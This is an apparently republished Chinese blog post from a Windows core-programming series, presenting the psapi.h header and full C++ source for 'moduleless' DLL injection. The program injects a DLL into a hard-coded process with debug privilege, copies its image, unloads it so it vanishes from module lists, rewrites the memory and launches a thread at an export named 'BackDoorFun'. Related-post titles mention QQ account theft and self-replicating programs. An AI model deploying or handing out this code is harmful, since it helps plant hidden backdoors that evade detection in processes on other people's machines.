基于visual c++之windows核心编程代码分析(63)无模块dll进程注射
来源:互联网 发布:java多进程同步 编辑:程序博客网 时间:2024/04/30 01:30
我们在信息安全编程的时候经常需要进行dll进程注入,
我们在编程中如何实现呢。
需要引用
Psapi.Lib,具体可以百度下载之。
其头文件如下,
odule Name: psapi.hAbstract: Include file for APIs provided by PSAPI.DLLAuthor: Richard Shupak [richards] 06-Jan-1994Revision History:--*/#ifndef _PSAPI_H_#define _PSAPI_H_#ifdef __cplusplusextern "C" {#endifBOOLWINAPIEnumProcesses( DWORD * lpidProcess, DWORD cb, DWORD * cbNeeded );BOOLWINAPIEnumProcessModules( HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded );DWORDWINAPIGetModuleBaseNameA( HANDLE hProcess, HMODULE hModule, LPSTR lpBaseName, DWORD nSize );DWORDWINAPIGetModuleBaseNameW( HANDLE hProcess, HMODULE hModule, LPWSTR lpBaseName, DWORD nSize );#ifdef UNICODE#define GetModuleBaseName GetModuleBaseNameW#else#define GetModuleBaseName GetModuleBaseNameA#endif // !UNICODEDWORDWINAPIGetModuleFileNameExA( HANDLE hProcess, HMODULE hModule, LPSTR lpFilename, DWORD nSize );DWORDWINAPIGetModuleFileNameExW( HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize );#ifdef UNICODE#define GetModuleFileNameEx GetModuleFileNameExW#else#define GetModuleFileNameEx GetModuleFileNameExA#endif // !UNICODEtypedef struct _MODULEINFO { LPVOID lpBaseOfDll; DWORD SizeOfImage; LPVOID EntryPoint;} MODULEINFO, *LPMODULEINFO;BOOLWINAPIGetModuleInformation( HANDLE hProcess, HMODULE hModule, LPMODULEINFO lpmodinfo, DWORD cb );BOOLWINAPIEmptyWorkingSet( HANDLE hProcess );BOOLWINAPIQueryWorkingSet( HANDLE hProcess, PVOID pv, DWORD cb );BOOLWINAPIInitializeProcessForWsWatch( HANDLE hProcess );typedef struct _PSAPI_WS_WATCH_INFORMATION { LPVOID FaultingPc; LPVOID FaultingVa;} PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;BOOLWINAPIGetWsChanges( HANDLE hProcess, PPSAPI_WS_WATCH_INFORMATION lpWatchInfo, DWORD cb );DWORDWINAPIGetMappedFileNameW( HANDLE hProcess, LPVOID lpv, LPWSTR lpFilename, DWORD nSize );DWORDWINAPIGetMappedFileNameA( HANDLE hProcess, LPVOID lpv, LPSTR lpFilename, DWORD nSize );#ifdef UNICODE#define GetMappedFilenameEx GetMappedFilenameExW#else#define GetMappedFilenameEx GetMappedFilenameExA#endif // !UNICODEBOOLWINAPIEnumDeviceDrivers( LPVOID *lpImageBase, DWORD cb, LPDWORD lpcbNeeded );DWORDWINAPIGetDeviceDriverBaseNameA( LPVOID ImageBase, LPSTR lpBaseName, DWORD nSize );DWORDWINAPIGetDeviceDriverBaseNameW( LPVOID ImageBase, LPWSTR lpBaseName, DWORD nSize );#ifdef UNICODE#define GetDeviceDriverBaseName GetDeviceDriverBaseNameW#else#define GetDeviceDriverBaseName GetDeviceDriverBaseNameA#endif // !UNICODEDWORDWINAPIGetDeviceDriverFileNameA( LPVOID ImageBase, LPSTR lpFilename, DWORD nSize );DWORDWINAPIGetDeviceDriverFileNameW( LPVOID ImageBase, LPWSTR lpFilename, DWORD nSize );#ifdef UNICODE#define GetDeviceDriverFileName GetDeviceDriverFileNameW#else#define GetDeviceDriverFileName GetDeviceDriverFileNameA#endif // !UNICODE// Structure for GetProcessMemoryInfo()typedef struct _PROCESS_MEMORY_COUNTERS { DWORD cb; DWORD PageFaultCount; DWORD PeakWorkingSetSize; DWORD WorkingSetSize; DWORD QuotaPeakPagedPoolUsage; DWORD QuotaPagedPoolUsage; DWORD QuotaPeakNonPagedPoolUsage; DWORD QuotaNonPagedPoolUsage; DWORD PagefileUsage; DWORD PeakPagefileUsage;} PROCESS_MEMORY_COUNTERS;typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;BOOLWINAPIGetProcessMemoryInfo( HANDLE Process, PPROCESS_MEMORY_COUNTERS ppsmemCounters, DWORD cb );#ifdef __cplusplus}#endif#endif
无模块dll进程注入请见下列代码与分析
#include "stdafx.h"#include "windows.h"#include "stdio.h"#include "Psapi.h"#include "Tlhelp32.h"//获得加载的DLL模块的信息,主要包括模块基地址和模块大小BOOL GetThreadInformation(DWORD ProcessID,char* Dllfullname,MODULEENTRY32 &Thread){HANDLE hthSnapshot = NULL; // 取得指定进程的所有模块映象. hthSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,ProcessID); if (hthSnapshot == NULL) return FALSE;// 取得所有模块列表中的指定的模块. BOOL bMoreMods = Module32First(hthSnapshot, &Thread); if (bMoreMods == FALSE)return FALSE;// 循环取得想要的模块. for (;bMoreMods; bMoreMods = Module32Next(hthSnapshot, &Thread)) {if (strcmp(Thread.szExePath, Dllfullname) == 0)break; }if (strcmp(Thread.szExePath, Dllfullname) == 0)return TRUE;elsereturn FALSE;}//调整进程权限BOOL AdjustPrivileges(HANDLE hProcess,LPCTSTR lpPrivilegeName){//******************************************************//调整进程权限//******************************************************HANDLE hToken; TOKEN_PRIVILEGES tkp; //打开进程的权限标记if (!::OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return FALSE;//传入lpPrivilegeName的Luid值 if(!::LookupPrivilegeValue(NULL, lpPrivilegeName, &tkp.Privileges[0].Luid)) return FALSE;tkp.PrivilegeCount = 1; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if(!::AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0)) return FALSE;return TRUE;}//注入DLL部分BOOL InjectRemoteProcess(HANDLE hProcess,char* Dllfullname){//开辟虚拟空间,以便写入DLL的完整路径PSTR pDllName=NULL;if((pDllName=(PSTR)::VirtualAllocEx(hProcess,NULL,strlen(Dllfullname)+1,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)return FALSE;BOOL writecode;if((writecode=::WriteProcessMemory(hProcess,pDllName, Dllfullname,strlen(Dllfullname)+1,NULL))==0)return FALSE;//取得LoadLibrary函数在Kernel32.dll中的地址. PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress( GetModuleHandle("Kernel32.dll"), "LoadLibraryA"); if (pfnThreadRtn== NULL)return FALSE; //打开远线程HANDLE hRemoteThread=NULL;if((hRemoteThread=::CreateRemoteThread(hProcess,NULL,0, pfnThreadRtn,pDllName, //loadlibrary参数,即dll的路径字符串在远程进程中的地址,若是多参数则放在一个结构体中0,NULL))==NULL)return FALSE;return TRUE;}//卸载DLLBOOL UnistallDll(HANDLE hProcess,BYTE * Address){// 取得FreeLibrary函数在Kernel32.dll中的地址.HANDLE hThread = NULL; PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)GetProcAddress( GetModuleHandle("Kernel32.dll"), "FreeLibrary"); if (pfnThreadRtn == NULL)return FALSE;// 创建远程线程来执行FreeLibrary函数. hThread = ::CreateRemoteThread(hProcess, NULL, 0, pfnThreadRtn, Address, 0, NULL); if (hThread == NULL) return FALSE;// 等待远程线程终止.::WaitForSingleObject(hThread, INFINITE); // 关闭句柄. ::CloseHandle(hThread);return TRUE;}#define pid 3844#define BackDoorFun 0x1014//DLL模块中导出函数的地址int main(int argc, char* argv[]){char Dllfullname[255];char Dllname[255];//打开进程HANDLE hRemoteProcess=NULL;if((hRemoteProcess=::OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid))==NULL){printf("OpenProcess faile!!");return 0;}BOOL Adjust=AdjustPrivileges(hRemoteProcess,SE_DEBUG_NAME);if(Adjust==FALSE){printf("Adjust process Privileges faile!!\n");return 0;}//获得DLL的完整路径 strcpy(Dllname,"dll.dll");::GetCurrentDirectory(255,Dllfullname); strcat(Dllfullname,"\\");strcat(Dllfullname,Dllname);BOOL Res=InjectRemoteProcess(hRemoteProcess,Dllfullname);if(Res==FALSE){printf("Inject Faile!!\n");return 0;}//等待远线程启动,否则获取不到插入的dll信息::Sleep(300);DWORD RemoteTheadAddress=0;MODULEENTRY32 Thread = {sizeof(Thread)};; RemoteTheadAddress=GetThreadInformation(pid,Dllfullname,Thread);if(RemoteTheadAddress==0){printf("Get RemoteTheadAddress Faile!!\n");return 0;}//分配保存DLL加载后的的缓冲区,并保存char *buffer=new char[Thread.modBaseSize+1];DWORD read;::ReadProcessMemory(hRemoteProcess,Thread.modBaseAddr,//加载的DLL模块基地址buffer,Thread.modBaseSize,//加载的DLL代码的大小&read);//卸载DLLBOOL Unstall=UnistallDll(hRemoteProcess,Thread.modBaseAddr);if(Unstall==FALSE){printf("Unistall dll Faile!!!\n");return 0;}//重新分配虚拟内存,注意从原模块基地址出开始分配LPVOID Alloc;Alloc=::VirtualAllocEx(hRemoteProcess,Thread.modBaseAddr,Thread.modBaseSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);if(Alloc== NULL){printf("VirtualAllocEx Failed!!\n");return 0;}BOOL Writer;DWORD Written;Writer=::WriteProcessMemory(hRemoteProcess,Thread.modBaseAddr,buffer,Thread.modBaseSize,&Written);if(Writer==0){printf("WriteProcessMemory Failed!!\n");return 0;}//重新启动新的无DLL模块的线程中的函数HANDLE hNewThread=NULL;if((hNewThread=::CreateRemoteThread(hRemoteProcess,NULL,0,(PTHREAD_START_ROUTINE)(Thread.modBaseAddr+BackDoorFun),//添加到进程中的数据的基地址Thread.modBaseAddr+dll导出函数的入口点地址NULL, //此处填写导出函数的参数地址,为简单期间,本导出函数没有参数,若有参数可用注入DLL中同样方法写进进程空间中0,NULL))==NULL) {printf("CreateNewThread faile!!\n");return 0;}return 0;}
- 基于visual c++之windows核心编程代码分析(63)无模块dll进程注射
- 基于visual c++之windows核心编程代码分析(63)无模块dll进程注射
- 基于visual c++之windows核心编程代码分析(19)枚举进程以及进程加载模块信息
- 基于visual c++之windows核心编程代码分析(19)枚举进程以及进程加载模块信息
- 基于visual c++之windows核心编程代码分析(54)实现Winlogon注入dll
- 基于visual c++之windows核心编程代码分析(54)实现Winlogon注入dll
- 基于visual c++之windows核心编程代码分析(17)通过pipe进程间通信
- 基于visual c++之windows核心编程代码分析(50)伪装进程路径
- 基于visual c++之windows核心编程代码分析(17)通过pipe进程间通信
- 基于visual c++之windows核心编程代码分析(17)通过pipe进程间通信
- 基于visual c++之windows核心编程代码分析(17)通过pipe进程间通信
- 基于visual c++之windows核心编程代码分析(42)windows下进程的身份切换
- 基于visual c++之windows核心编程代码分析(53)在C++中嵌入汇编实现DLL注入源代码
- 基于visual c++之windows核心编程代码分析(16)使用邮槽进行进程通信
- 基于visual c++之windows核心编程代码分析(52)使用WMI 获取进程启动参数
- 基于visual c++之windows核心编程代码分析(57)监控系统的每一个进程的创建
- 基于visual c++之windows核心编程代码分析(16)使用邮槽进行进程通信
- 基于Visual C++之Windows核心编程代码分析(2)实现Windows用户管理
- 基于visual c++之windows核心编程代码分析(59)实现网络简单代理编程
- 基于visual c++之windows核心编程代码分析(60)实现系统盘定制与软件自动安装
- 基于visual c++之windows核心编程代码分析(61)打造自己的Windows输入法
- 分享关于平板电视的一些使用、选购经验和想法。
- 基于visual c++之windows核心编程代码分析(62)读取本地已登录的QQ号及应用代码
- 基于visual c++之windows核心编程代码分析(63)无模块dll进程注射
- 对字符编码的学习理解
- 互联网访问oracle(监听器)
- 基于visual c++之windows核心编程代码分析(64)现有的exe文件中添加自己的代码
- 基于visual c++之windows核心编程代码分析(65)实现程序自我复制
- 基于visual c++之windows核心编程代码分析(66)实现Windows服务的远程控制
- C++ 泛型 Heap 实现
- 优酷,土豆,迅雷看看等视频网站去广告其实有很多方法
- 安装Cocos2D-iPhone的方法